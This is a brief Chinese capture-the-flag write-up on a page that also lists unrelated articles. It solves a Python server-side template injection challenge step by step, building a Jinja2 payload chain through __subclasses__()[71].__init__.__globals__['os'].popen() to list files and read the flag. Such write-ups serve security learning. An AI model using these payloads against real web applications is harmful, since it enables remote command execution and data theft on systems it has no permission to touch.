当前位置: 首页 > news >正文

Web_python_template_injection SSTI printer方法

news 2025/7/5 22:42:45

这题挺简单的 就是记录一下不同方法的rce

python_template_injection

ssti了

{{''.__class__.__mro__[2].__subclasses__()}}

然后用脚本跑可以知道是 71

{{''.__class__.__mro__[2].__subclasses__()[71]}}

然后直接 init

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__}}

 存在os

直接通过os rce 了

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

http://www.lryc.cn/news/184170.html

相关文章:

  • TCP/IP网络江湖——江湖导航(网络层上篇)
  • 数据结构——AVL树(详解 + C++模拟实现)
  • redis 雪崩,穿透,击穿及解决方案
  • Flutter环境搭建及新建项目
  • 【面试题精讲】深拷贝和浅拷贝区别了解吗?什么是引用拷贝?
  • CentOS7.9中使用packstack安装train版本
  • mfw git泄露构造闭合
  • UE5修改导航网格的参数
  • 郁金香2021年游戏辅助技术中级班(七)
  • 【网络】路由器和交换机的区别
  • SQL的CASE WHEN函数、CAST函数、CONVERT() 函数、COALESCE()函数、DATEDIFF()函数
  • 前后端分离计算机毕设项目之基于springboot+vue的房屋租赁系统《内含源码+文档+部署教程》
  • 《Spring框架前世今生》
  • 基于树种优化的BP神经网络(分类应用) - 附代码
  • 纳百川冲刺创业板上市:计划募资约8亿元,宁德时代为主要合作方
  • light client轻节点简介
  • 1500*B. Zero Array(贪心数学找规律)
  • java Spring Boot整合jwt实现token生成并验证效果
  • 基础-MVP图像处理-仿射变换
  • Linux嵌入式学习之Ubuntu入门(六)shell脚本详解
  • 学习完C++ 并发编程后 手写线程池 最简单的线程池
  • 【Overload游戏引擎分析】编辑器对象鼠标拾取原理
  • 【Spring内容进阶 | 第三篇】AOP进阶内容
  • 华为云ModelArts:引领AI艺术创作的未来,让人人都可以成为“艺术家”!
  • Elasticsearch:如何从 Elasticsearch 集群中删除数据节点
  • 长假回归,回顾一下所有的电商API接口
  • 认识计算机主板
  • PHP乱七八糟面试题
  • pom管理规范
  • AI大模型的安全隐患问题与新兴Anthropic新势力涌动